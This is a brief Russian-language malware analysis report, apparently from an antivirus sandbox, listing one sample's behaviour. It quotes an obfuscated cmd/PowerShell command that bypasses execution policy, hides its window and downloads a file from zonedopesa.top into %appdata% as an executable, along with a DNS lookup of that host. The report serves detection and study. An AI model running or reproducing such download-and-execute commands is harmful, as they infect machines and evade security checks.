Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POW^ERs^hELL.exe^ -ExECutIO^nPo^l^i^c^Y B^yPass^ -NOProfI^lE -^wI^NDOW^St^YL^E ^HiDd^En^ ^(^n^ew-oBje^cT sYSTe^M^.nET.^WEbCl^ient).DOWNl^o^adfiLe('http://www.zonedopesa.top/read...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "POW^ERs^hELL.exe^ -ExECutIO^nPo^l^i^c^Y B^yPass^ -NOProfI^lE -^wI^NDOW^St^YL^E ^HiDd^En^ ^(^n^ew-oBje^cT sYSTe^M^.nET.^WEbCl^ient).DOWNl^o^adfiLe('http://www.zonedopesa.top/read...' (со скрытым окном)